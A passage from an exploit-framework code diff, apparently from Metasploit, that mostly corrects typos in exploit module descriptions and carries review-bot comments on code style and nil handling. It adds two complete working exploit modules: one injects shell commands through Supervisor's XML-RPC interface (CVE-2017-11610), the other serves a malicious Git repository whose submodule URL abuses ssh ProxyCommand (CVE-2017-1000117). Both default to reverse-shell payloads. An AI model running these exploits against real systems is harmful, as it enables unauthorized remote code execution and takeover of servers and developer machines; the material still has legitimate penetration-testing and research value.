failed to deploy") + end + print_status('Waiting for the cron job to run, can take up to 60 seconds') + end +end diff --git a/modules/exploits/linux/http/gitlist_exec.rb b/modules/exploits/linux/http/gitlist_exec.rb index 4a104e38f4..f9c29fa017 100644 --- a/modules/exploits/linux/http/gitlist_exec.rb +++ b/modules/exploits/linux/http/gitlist_exec.rb 
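Review bot: `check` calls `res.headers['Server'].include? 'Docker'`, which raises `NoMethodError` when the daemon answers without a `Server` header, and both `pull_image` (`return unless res.code == 200`) and the `if res_wait.code == 200` test in `exploit` call `.code` on a response that, judging by the guard in `check_image`, `send_request_raw` can return as nil. The nil-safe form used in `check_image` should be applied at all three sites: `res.headers['Server'].to_s.include?('Docker')`, `return unless res && res.code == 200` in `pull_image`, and `if res_wait && res_wait.code == 200`. The `deleted_container` flag in `exploit` is redundant, since both branches call `del_container(container_id)` and only the failure branch then calls `fail_with`; `del_container(container_id)` followed by `fail_with(...) unless res_wait && res_wait.code == 200` expresses the same flow in two lines. Style-wise the new code mixes `and` with `&&` in conditions (`return unless res and res.code == 200 and ...`, `if res and res.code == 200 and ...`); `&&` avoids the precedence surprise and matches the rest of the file.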
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Gitlist Unauthenticated Remote Command Execution', 'Description' => %q{ This module exploits an unauthenticated remote command execution vulnerability - in version 0.4.0 of Gitlist. The problem exists in the handling of an specially + in version 0.4.0 of Gitlist. The problem exists in the handling of a specially crafted file name when trying to blame it. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/linux/http/linksys_apply_cgi.rb b/modules/exploits/linux/http/linksys_apply_cgi.rb index 2511f147de..f17e5a921c 100644 --- a/modules/exploits/linux/http/linksys_apply_cgi.rb +++ b/modules/exploits/linux/http/linksys_apply_cgi.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a stack buffer overflow in apply.cgi on the Linksys WRT54G and WRT54GS routers. According to iDefense who discovered this vulnerability, all WRT54G versions prior to - 4.20.7 and all WRT54GS version prior to 1.05.2 may be be affected. + 4.20.7 and all WRT54GS version prior to 1.05.2 may be affected. }, 'Author' => [ 'Raphael Rigo ', 'Julien Tinnes ' ], 'License' => MSF_LICENSE, diff --git a/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb b/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb index e980ec7f98..73e9f55953 100644 --- a/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb +++ b/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb 
@@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote their web interface where default credentials are admin/admin or admin/password. Since it is a blind OS command injection vulnerability, there is no output for the executed command when using the cmd generic payload. This module has been tested on - a Linksys WRT160n version 2 - firmware version v2.0.03. A ping command against a + a Linksys WRT160n version 2 - firmware version v2.0.03. A ping command against a controlled system could be used for testing purposes. The exploit uses the tftp client from the device to stage to native payloads from the command injection. }, diff --git a/modules/exploits/linux/http/logsign_exec.rb b/modules/exploits/linux/http/logsign_exec.rb index 5feede5733..7be1da5a3f 100644 --- a/modules/exploits/linux/http/logsign_exec.rb +++ b/modules/exploits/linux/http/logsign_exec.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Logsign Remote Command Injection', 'Description' => %q{ - This module exploits an command injection vulnerability in Logsign. + This module exploits a command injection vulnerability in Logsign. By exploiting this vulnerability, unauthenticated users can execute arbitrary code under the root user. diff --git a/modules/exploits/linux/http/railo_cfml_rfi.rb b/modules/exploits/linux/http/railo_cfml_rfi.rb index 2757aaddcd..874e28a801 100644 --- a/modules/exploits/linux/http/railo_cfml_rfi.rb +++ b/modules/exploits/linux/http/railo_cfml_rfi.rb 
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => ' This module exploits a remote file include vulnerability in Railo, tested against version 4.2.1. First, a call using a vulnerable - line in thumbnail.cfm allows an atacker to download an + line in thumbnail.cfm allows an attacker to download an arbitrary PNG file. By appending a .cfm, and taking advantage of a directory traversal, an attacker can append cold fusion markup to the PNG file, and have it interpreted by the server. This is diff --git a/modules/exploits/linux/http/sophos_wpa_iface_exec.rb b/modules/exploits/linux/http/sophos_wpa_iface_exec.rb index ca82667545..757d663377 100644 --- a/modules/exploits/linux/http/sophos_wpa_iface_exec.rb +++ b/modules/exploits/linux/http/sophos_wpa_iface_exec.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module takes advantage of two vulnerabilities in order to gain remote code execution as root as an otherwise non-privileged authorized user. By taking advantage of a mass assignment - vulnerability that allows an unprivileged authenticated user to change the admininistrator's + vulnerability that allows an unprivileged authenticated user to change the administrator's password hash, the module updates the password to login as the admin to reach the second vulnerability. No server-side sanitization is done on values passed when configuring a static network interface. This allows an administrator user to run arbitrary commands in the context of the web application, diff --git a/modules/exploits/linux/http/supervisor_xmlrpc_exec.rb b/modules/exploits/linux/http/supervisor_xmlrpc_exec.rb new file mode 100644 index 0000000000..3f28f6f321 --- /dev/null +++ b/modules/exploits/linux/http/supervisor_xmlrpc_exec.rb 
@@ -0,0 +1,169 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + def initialize(info={}) + super(update_info(info, + 'Name' => "Supervisor XML-RPC Authenticated Remote Code Execution", + 'Description' => %q{ + This module exploits a vulnerability in the Supervisor process control software, where an authenticated client + can send a malicious XML-RPC request to supervisord that will run arbitrary shell commands on the server. + The commands will be run as the same user as supervisord. Depending on how supervisord has been configured, this + may be root. This vulnerability can only be exploited by an authenticated client, or if supervisord has been + configured to run an HTTP server without authentication. This vulnerability affects versions 3.0a1 to 3.3.2. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Calum Hutton ' + ], + 'References' => + [ + ['URL', 'https://github.com/Supervisor/supervisor/issues/964'], + ['URL', 'https://www.debian.org/security/2017/dsa-3942'], + ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11610'], + ['URL', 'https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610'], + ['CVE', '2017-11610'] + ], + 'Platform' => 'linux', + 'Targets' => + [ + ['3.0a1-3.3.2', {}] + ], + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'DefaultOptions' => + { + 'RPORT' => 9001, + 'Payload' => 'linux/x64/meterpreter/reverse_tcp', + }, + 'Privileged' => false, + 'DisclosureDate' => 'Jul 19 2017', + 'DefaultTarget' => 0 + )) + + register_options( + [ + Opt::RPORT(9001), + OptString.new('HttpUsername', [false, 'Username for HTTP basic auth']), + OptString.new('HttpPassword', [false, 'Password for HTTP basic auth']), + OptString.new('TARGETURI', [true, 'The path to the XML-RPC endpoint', '/RPC2']), + ] + ) + end + + def check_version(version) + if version <= Gem::Version.new('3.3.2') and version >= Gem::Version.new('3.0a1') + return true + else + return false + end + end + + def check + + print_status('Extracting version from web interface..') + + params = { + 'method' => 'GET', + 'uri' => normalize_uri('/') + } + if !datastore['HttpUsername'].to_s.empty? and !datastore['HttpPassword'].to_s.empty? 
+ print_status("Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})") + params.merge!({'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])}) + end + res = send_request_cgi(params) + + if res + if res.code == 200 + match = res.body.match(/(\d+\.[\dab]\.\d+)<\/span>/) + if match + version = Gem::Version.new(match[1]) + if check_version(version) + print_good("Vulnerable version found: #{version}") + return Exploit::CheckCode::Appears + else + print_bad("Version #{version} is not vulnerable") + return Exploit::CheckCode::Safe + end + else + print_bad('Could not extract version number from web interface') + return Exploit::CheckCode::Unknown + end + elsif res.code == 401 + print_bad("Authentication failed: #{res.code} response") + return Exploit::CheckCode::Safe + else + print_bad("Unexpected HTTP code: #{res.code} response") + return Exploit::CheckCode::Unknown + end + else + print_bad('Error connecting to web interface') + return Exploit::CheckCode::Unknown + end + + end + + def execute_command(cmd, opts = {}) + + # XML-RPC payload template, use nohup and & to detach and background the process so it doesnt hangup the web server + # Credit to the following urls for the os.system() payload + # https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610 + # https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html + xml_payload = %{ + + supervisor.supervisord.options.warnings.linecache.os.system + + + echo -n #{Rex::Text.encode_base64(cmd)}|base64 -d|nohup bash > /dev/null 2>&1 & + + +} + + # Send the XML-RPC payload via POST to the specified endpoint + endpoint_path = target_uri.path + print_status("Sending XML-RPC payload via POST to #{peer}#{datastore['TARGETURI']}") + + params = { + 'method' => 'POST', + 'uri' => normalize_uri(endpoint_path), + 'ctype' => 'text/xml', + 'headers' => {'Accept' => 'text/xml'}, + 'data' => xml_payload, + 'encode_params' => false + } + if 
!datastore['HttpUsername'].to_s.empty? and !datastore['HttpPassword'].to_s.empty? + print_status("Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})") + params.merge!({'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])}) + end + return send_request_cgi(params, timeout=5) + + end + + def exploit + + res = execute_cmdstager(:linemax => 800) + + if res + if res.code == 401 + fail_with(Failure::NoAccess, "Authentication failed: #{res.code} response") + elsif res.code == 404 + fail_with(Failure::NotFound, "Invalid XML-RPC endpoint: #{res.code} response") + else + fail_with(Failure::UnexpectedReply, "Unexpected HTTP code: #{res.code} response") + end + else + print_good('Request returned without status code, usually indicates success. Passing to handler..') + handler + end + + end + +end diff --git a/modules/exploits/linux/http/symantec_messaging_gateway_exec.rb b/modules/exploits/linux/http/symantec_messaging_gateway_exec.rb index e4047371ba..139d8704c8 100644 --- a/modules/exploits/linux/http/symantec_messaging_gateway_exec.rb +++ b/modules/exploits/linux/http/symantec_messaging_gateway_exec.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote terminal command under the context of the web server user which is root. backupNow.do endpoint takes several user inputs and then pass them to the internal service which is responsible for executing - operating system command. One of the user input is being passed to the service without proper validation. That cause an command + operating system command. One of the user input is being passed to the service without proper validation. That cause a command injection vulnerability. But given parameters, such a SSH ip address, port and credentials are validated before executing terminal command. Thus, you need to configure your own SSH service and set the required parameter during module usage. 
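Review bot: Both `check` and `execute_command` echo the configured password to the console with `print_status("Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})")`, so the credential ends up in session logs and screenshots; printing only the account, `print_status("Using basic auth as #{datastore['HttpUsername']}")`, is enough, and the duplicated auth block could move into one small helper both methods call. In `execute_command`, `send_request_cgi(params, timeout=5)` assigns a throwaway local instead of naming a keyword; write `send_request_cgi(params, 5)`. The version regex `/(\d+\.[\dab]\.\d+)<\/span>/` only allows a single digit or a/b as the middle component, so a pre-release string such as 3.0a1, which `check_version` explicitly includes, would apparently fall through to "Could not extract version number" — worth confirming against what the web UI actually renders. `check_version` itself can be the range test `(Gem::Version.new('3.0a1')..Gem::Version.new('3.3.2')).cover?(version)`, and the `and` in the two auth conditions should be `&&`.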
diff --git a/modules/exploits/linux/http/trend_micro_imsva_exec.rb b/modules/exploits/linux/http/trend_micro_imsva_exec.rb index 7ae12253be..5b6991a5dc 100644 --- a/modules/exploits/linux/http/trend_micro_imsva_exec.rb +++ b/modules/exploits/linux/http/trend_micro_imsva_exec.rb @@ -19,7 +19,7 @@ class MetasploitModule < Msf::Exploit::Remote saveCert.imss endpoint takes several user inputs and performs blacklisting. After that it use them as argument of predefined operating system command - without proper sanitation. However,due to improper blacklisting rule it's possible to inject + without proper sanitation. However, due to improper blacklisting rule it's possible to inject arbitrary commands into it. InterScan Messaging Security prior to 9.1.-1600 affected by this issue. This module was tested against IMSVA 9.1-1600. diff --git a/modules/exploits/linux/http/trueonline_billion_5200w_rce.rb b/modules/exploits/linux/http/trueonline_billion_5200w_rce.rb index d856f8f1e6..0502ebe3d0 100644 --- a/modules/exploits/linux/http/trueonline_billion_5200w_rce.rb +++ b/modules/exploits/linux/http/trueonline_billion_5200w_rce.rb @@ -12,8 +12,8 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'TrueOnline / Billion 5200W-T Router Unauthenticated Command Injection', 'Description' => %q{ - TrueOnline is a major ISP in Thailand, and it distributes a customised version of - the Billion 5200W-T router. This customised version has at least two command injection + TrueOnline is a major ISP in Thailand, and it distributes a customized version of + the Billion 5200W-T router. This customized version has at least two command injection vulnerabilities, one authenticated and one unauthenticated, on different firmware versions. This module will attempt to exploit the unauthenticated injection first, and if that fails, it will attempt to exploit the authenticated injection. 
diff --git a/modules/exploits/linux/http/trueonline_p660hn_v1_rce.rb b/modules/exploits/linux/http/trueonline_p660hn_v1_rce.rb index 8f385b0052..b854cb5688 100644 --- a/modules/exploits/linux/http/trueonline_p660hn_v1_rce.rb +++ b/modules/exploits/linux/http/trueonline_p660hn_v1_rce.rb @@ -12,8 +12,8 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'TrueOnline / ZyXEL P660HN-T v1 Router Unauthenticated Command Injection', 'Description' => %q{ - TrueOnline is a major ISP in Thailand, and it distributes a customised version of - the ZyXEL P660HN-T v1 router. This customised version has an unauthenticated command + TrueOnline is a major ISP in Thailand, and it distributes a customized version of + the ZyXEL P660HN-T v1 router. This customized version has an unauthenticated command injection vulnerability in the remote log forwarding page. This module was tested in an emulated environment, as the author doesn't have access to the Thai router any more. Any feedback should be sent directly to the module's author, as well as diff --git a/modules/exploits/linux/http/trueonline_p660hn_v2_rce.rb b/modules/exploits/linux/http/trueonline_p660hn_v2_rce.rb index 218f3447b0..577c36ca3b 100644 --- a/modules/exploits/linux/http/trueonline_p660hn_v2_rce.rb +++ b/modules/exploits/linux/http/trueonline_p660hn_v2_rce.rb 
@@ -14,8 +14,8 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'TrueOnline / ZyXEL P660HN-T v2 Router Authenticated Command Injection', 'Description' => %q{ - TrueOnline is a major ISP in Thailand, and it distributes a customised version of - the ZyXEL P660HN-T v2 router. This customised version has an authenticated command injection + TrueOnline is a major ISP in Thailand, and it distributes a customized version of + the ZyXEL P660HN-T v2 router. This customized version has an authenticated command injection vulnerability in the remote log forwarding page. This can be exploited using the "supervisor" account that comes with a default password on the device. This module was tested in an emulated environment, as the author doesn't have access to the diff --git a/modules/exploits/linux/http/webcalendar_settings_exec.rb b/modules/exploits/linux/http/webcalendar_settings_exec.rb index b5bf903a02..0555dfb873 100644 --- a/modules/exploits/linux/http/webcalendar_settings_exec.rb +++ b/modules/exploits/linux/http/webcalendar_settings_exec.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => "WebCalendar 1.2.4 Pre-Auth Remote Code Injection", 'Description' => %q{ - This modules exploits a vulnerability found in k5n.us WebCalendar, version 1.2.4 or + This module exploits a vulnerability found in k5n.us WebCalendar, version 1.2.4 or less. If not removed, the settings.php script meant for installation can be update by an attacker, and then inject code in it. This allows arbitrary code execution as www-data. diff --git a/modules/exploits/linux/local/desktop_privilege_escalation.rb b/modules/exploits/linux/local/desktop_privilege_escalation.rb index 32043f28b4..40b430b85d 100644 --- a/modules/exploits/linux/local/desktop_privilege_escalation.rb +++ b/modules/exploits/linux/local/desktop_privilege_escalation.rb 
@@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Local when it is entered for unlocking the screen or for doing administrative actions using PolicyKit. Then, it escalates to root privileges using sudo and the stolen user password. It exploits the design weakness that there is no trusted channel for transferring the - password from the keyboard to the actual password verificatition against the shadow file + password from the keyboard to the actual password verification against the shadow file (which is running as root since /etc/shadow is only readable to the root user). Both screensavers (xscreensaver/gnome-screensaver) and PolicyKit use a component running under the current user account to query for the password and then pass it to a setuid-root binary diff --git a/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb b/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb index 21ff14a0d1..59ed4e51f8 100644 --- a/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb +++ b/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb @@ -64,7 +64,7 @@ class MetasploitModule < Msf::Exploit::Local %Q{ IMG=`(echo "FROM scratch"; echo "CMD a") | docker build -q - | awk "END { print \\\\$NF }"` - EXPLOIT="chown 0:0 #{exploit_path}; chmod u+s #{exploit_path}" + EXPLOIT="chown 0:0 #{exploit_path}; chmod u+s #{exploit_path}; chmod +x #{exploit_path}" docker run #{dep_options} $IMG /bin/sh -c "$EXPLOIT" docker rmi -f $IMG #{exploit_path} diff --git a/modules/exploits/linux/local/netfilter_priv_esc_ipv4.rb b/modules/exploits/linux/local/netfilter_priv_esc_ipv4.rb index 9df1bba9e8..7cdbcfdd14 100644 --- a/modules/exploits/linux/local/netfilter_priv_esc_ipv4.rb +++ b/modules/exploits/linux/local/netfilter_priv_esc_ipv4.rb 
@@ -14,13 +14,13 @@ class MetasploitModule < Msf::Exploit::Local super(update_info(info, 'Name' => 'Linux Kernel 4.6.3 Netfilter Privilege Escalation', 'Description' => %q{ - This module attempts to exploit a netfilter bug on Linux Kernels befoe 4.6.3, and currently + This module attempts to exploit a netfilter bug on Linux Kernels before 4.6.3, and currently only works against Ubuntu 16.04 (not 16.04.1) with kernel 4.4.0-21-generic. Several conditions have to be met for successful exploitation: Ubuntu: 1. ip_tables.ko (ubuntu), iptable_raw (fedora) has to be loaded (root running iptables -L will do such) - 2. libc6-dev-i386 (ubuntu), glibc-devel.i686 & libgcc.i686 (fedora) needs to be installed to compile + 2. libc6-dev-i386 (ubuntu), glibc-devel.i686 & libgcc.i686 (fedora) needs to be installed to compile Kernel 4.4.0-31-generic and newer are not vulnerable. We write the ascii files and compile on target instead of locally since metasm bombs for not diff --git a/modules/exploits/linux/local/sock_sendpage.rb b/modules/exploits/linux/local/sock_sendpage.rb index 1eb643bcc6..1e27130525 100644 --- a/modules/exploits/linux/local/sock_sendpage.rb +++ b/modules/exploits/linux/local/sock_sendpage.rb @@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Local 'Description' => %q{ The Linux kernel failed to properly initialize some entries the proto_ops struct for several protocols, leading to NULL being - derefenced and used as a function pointer. By using mmap(2) to map + dereferenced and used as a function pointer. By using mmap(2) to map page 0, an attacker can execute arbitrary code in the context of the kernel. diff --git a/modules/exploits/linux/misc/opennms_java_serialize.rb b/modules/exploits/linux/misc/opennms_java_serialize.rb index a36ef01a6c..553f8375a6 100644 --- a/modules/exploits/linux/misc/opennms_java_serialize.rb +++ b/modules/exploits/linux/misc/opennms_java_serialize.rb 
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'OpenNMS Java Object Unserialization Remote Code Execution', 'Description' => %q( This module exploits a vulnerability in the OpenNMS Java object which allows - an unauthenticated attacker to run arbitary code against the system. + an unauthenticated attacker to run arbitrary code against the system. ), 'Author' => [ diff --git a/modules/exploits/linux/postgres/postgres_payload.rb b/modules/exploits/linux/postgres/postgres_payload.rb index 48fb7b2e61..01a79802b4 100644 --- a/modules/exploits/linux/postgres/postgres_payload.rb +++ b/modules/exploits/linux/postgres/postgres_payload.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ On some default Linux installations of PostgreSQL, the postgres service account may write to the /tmp directory, and - may source UDF Shared Libraries's from there as well, allowing + may source UDF Shared Libraries from there as well, allowing execution of arbitrary code. This module compiles a Linux shared object file, uploads it to diff --git a/modules/exploits/linux/samba/lsa_transnames_heap.rb b/modules/exploits/linux/samba/lsa_transnames_heap.rb index 906b7b2cc6..eaf9a7d747 100644 --- a/modules/exploits/linux/samba/lsa_transnames_heap.rb +++ b/modules/exploits/linux/samba/lsa_transnames_heap.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote This module triggers a heap overflow in the LSA RPC service of the Samba daemon. This module uses the TALLOC chunk overwrite method (credit Ramon and Adriano), which only works with Samba - versions 3.0.21-3.0.24. Additonally, this module will not work + versions 3.0.21-3.0.24. Additionally, this module will not work when the Samba "log level" parameter is higher than "2". }, 'Author' => diff --git a/modules/exploits/linux/smtp/exim4_dovecot_exec.rb b/modules/exploits/linux/smtp/exim4_dovecot_exec.rb index 6b5b51d625..e08819eba0 100644 
--- a/modules/exploits/linux/smtp/exim4_dovecot_exec.rb +++ b/modules/exploits/linux/smtp/exim4_dovecot_exec.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Exim and Dovecot Insecure Configuration Command Injection', 'Description' => %q{ This module exploits a command injection vulnerability against Dovecot with - Exim using the "use_shell" option. It uses the sender's address to inject arbitary + Exim using the "use_shell" option. It uses the sender's address to inject arbitrary commands, since this is one of the user-controlled variables. It has been successfully tested on Debian Squeeze using the default Exim4 with the dovecot-common packages. diff --git a/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb b/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb index d4e810f4c0..012cbc12bb 100644 --- a/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb +++ b/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb @@ -25,7 +25,7 @@ class MetasploitModule < Msf::Exploit::Remote Windows Vista SP2 + Firefox 39.0 and Flash 18.0.0.203, Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.203, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194, - Windows 7 SP1 (32-bit), IE9 and Adobe Flash Flash 18.0.0.203, + Windows 7 SP1 (32-bit), IE9 and Adobe Flash 18.0.0.203, Windows 7 SP1 (32-bit), Firefox and Adobe Flash 18.0.0.194, Windows 8.1 (32-bit), IE11 and Adobe Flash 18.0.0.194, windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.203, diff --git a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb index f0a208ad31..7176ff56ec 100644 --- a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb +++ b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb 
@@ -28,7 +28,7 @@ class MetasploitModule < Msf::Exploit::Remote the chrome-based defineProperty method is made available. With the defineProperty method, functions belonging to window and document can be - overriden with a function that gets called from chrome-privileged context. From here, + overridden with a function that gets called from chrome-privileged context. From here, another vulnerability in the crypto.generateCRMFRequest function is used to "peek" into the context's private scope. Since the window does not have a chrome:// URL, the insecure parts of Components.classes are not available, so instead the AddonManager diff --git a/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb b/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb index fdc0f0c2c9..19e1716081 100644 --- a/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb +++ b/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb @@ -65,9 +65,9 @@ class MetasploitModule < Msf::Exploit::Remote end def generate_html - html = %Q|Loading, Please Wait...\n| + html = %Q|Loading, Please Wait...\n| + html << %Q|\n| html << %Q|

Addon required to view this page. [Install]

\n| - html << %Q|\n| html << %Q|| return html end diff --git a/modules/exploits/multi/browser/itms_overflow.rb b/modules/exploits/multi/browser/itms_overflow.rb index 3be0c76250..40370f7411 100644 --- a/modules/exploits/multi/browser/itms_overflow.rb +++ b/modules/exploits/multi/browser/itms_overflow.rb @@ -98,11 +98,14 @@ class MetasploitModule < Msf::Exploit::Remote # Return back an example URL. Using an iframe doesn't work with all # browsers, but that's easy enough to fix if you need to. return String(<<-EOS) -iTunes loading . . . + + +iTunes loading . . . + +

iTunes should open automatically, but if it doesn't, click to continue.

- EOS diff --git a/modules/exploits/multi/browser/java_verifier_field_access.rb b/modules/exploits/multi/browser/java_verifier_field_access.rb index 9ad956d820..124b95a3fb 100644 --- a/modules/exploits/multi/browser/java_verifier_field_access.rb +++ b/modules/exploits/multi/browser/java_verifier_field_access.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Java Applet Field Bytecode Verifier Cache Remote Code Execution', 'Description' => %q{ This module exploits a vulnerability in HotSpot bytecode verifier where an invalid - optimisation of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficent + optimization of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient type checks. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations. }, diff --git a/modules/exploits/multi/fileformat/swagger_param_inject.rb b/modules/exploits/multi/fileformat/swagger_param_inject.rb index b716b9df65..2caa9da10b 100644 --- a/modules/exploits/multi/fileformat/swagger_param_inject.rb +++ b/modules/exploits/multi/fileformat/swagger_param_inject.rb @@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'JSON Swagger CodeGen Parameter Injector', 'Description' => %q{ - This module generates a Open API Specification 2.0 (Swagger) compliant + This module generates an Open API Specification 2.0 (Swagger) compliant json document that includes payload insertion points in parameters. In order for the payload to be executed, an attacker must convince diff --git a/modules/exploits/multi/http/eventlog_file_upload.rb b/modules/exploits/multi/http/eventlog_file_upload.rb index e1071f2db0..628cdabe5c 100644 --- a/modules/exploits/multi/http/eventlog_file_upload.rb +++ b/modules/exploits/multi/http/eventlog_file_upload.rb 
@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a file upload vulnerability in ManageEngine Eventlog Analyzer. The vulnerability exists in the agentUpload servlet which accepts unauthenticated - file uploads and handles zip file contents in a insecure way. By combining both + file uploads and handles zip file contents in an insecure way. By combining both weaknesses a remote attacker can achieve remote code execution. This module has been tested successfully on versions v7.0 - v9.9 b9002 in Windows and Linux. Versions between 7.0 and < 8.1 are only exploitable via EAR deployment in the JBoss server, diff --git a/modules/exploits/multi/http/git_submodule_command_exec.rb b/modules/exploits/multi/http/git_submodule_command_exec.rb new file mode 100644 index 0000000000..4b19fe57bd --- /dev/null +++ b/modules/exploits/multi/http/git_submodule_command_exec.rb 
@@ -0,0 +1,200 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpServer + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Malicious Git HTTP Server For CVE-2017-1000117', + 'Description' => %q( + This module exploits CVE-2017-1000117, which affects Git + version 2.7.5 and lower. A submodule of the form 'ssh://' can be passed + parameters from the username incorrectly. This can be used to inject + commands to the operating system when the submodule is cloned. + + This module creates a fake git repository which contains a submodule + containing the vulnerability. The vulnerability is triggered when the + submodules are initialised. + ), + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2017-1000117'], + ['URL', 'http://seclists.org/oss-sec/2017/q3/280' ] + ], + 'DisclosureDate' => 'Aug 10 2017', + 'Targets' => + [ + [ + 'Automatic', + { + 'Platform' => [ 'unix' ], + 'Arch' => ARCH_CMD, + 'Payload' => + { + 'Compat' => + { + 'PayloadType' => 'python' + } + } + } + ] + ], + 'DefaultOptions' => + { + 'Payload' => 'cmd/unix/reverse_python' + }, + 'DefaultTarget' => 0 + ) + ) + + register_options( + [ + OptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty for random)', '']), + OptString.new('GIT_SUBMODULE', [false, 'The path to use as the malicious git submodule (empty for random)', '']) + ] + ) + end + + def setup + @repo_data = { + git: { files: {} } + } + setup_git + super + end + + def setup_git + # URI must start with a / + unless git_uri && git_uri =~ /^\// + fail_with(Failure::BadConfig, 'GIT_URI must start with a /') + end + + payload_cmd = payload.encoded + " &" + payload_cmd = Rex::Text.to_hex(payload_cmd, '%') + + submodule_path = datastore['GIT_SUBMODULE'] + if submodule_path.blank? 
+ submodule_path = Rex::Text.rand_text_alpha(rand(8) + 2).downcase + end + + gitmodules = "[submodule \"#{submodule_path}\"] +path = #{submodule_path} +url = ssh://-oProxyCommand=#{payload_cmd}/ +" + sha1, content = build_object('blob', gitmodules) + @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content + + tree = "100644 .gitmodules\0#{[sha1].pack('H*')}" + tree += "160000 #{submodule_path}\0#{[sha1].pack('H*')}" + sha1, content = build_object('tree', tree) + @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content + + ## build the supposed commit that dropped this file, which has a random user/company + email = Rex::Text.rand_mail_address + first, last, company = email.scan(/([^\.]+)\.([^\.]+)@(.*)$/).flatten + full_name = "#{first.capitalize} #{last.capitalize}" + tstamp = Time.now.to_i + author_time = rand(tstamp) + commit_time = rand(author_time) + tz_off = rand(10) + commit = "author #{full_name} <#{email}> #{author_time} -0#{tz_off}00\n" \ + "committer #{full_name} <#{email}> #{commit_time} -0#{tz_off}00\n" \ + "\n" \ + "Initial commit to open git repository for #{company}!\n" + + sha1, content = build_object('commit', "tree #{sha1}\n#{commit}") + @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content + @repo_data[:git][:files]['/HEAD'] = "ref: refs/heads/master\n" + @repo_data[:git][:files]['/info/refs'] = "#{sha1}\trefs/heads/master\n" + end + + # Build's a Git object + def build_object(type, content) + # taken from http://schacon.github.io/gitbook/7_how_git_stores_objects.html + header = "#{type} #{content.size}\0" + store = header + content + [Digest::SHA1.hexdigest(store), Zlib::Deflate.deflate(store)] + end + + # Returns the Git object path name that a file with the provided SHA1 will reside in + def get_path(sha1) + sha1[0...2] + '/' + sha1[2..40] + end + + def exploit + super 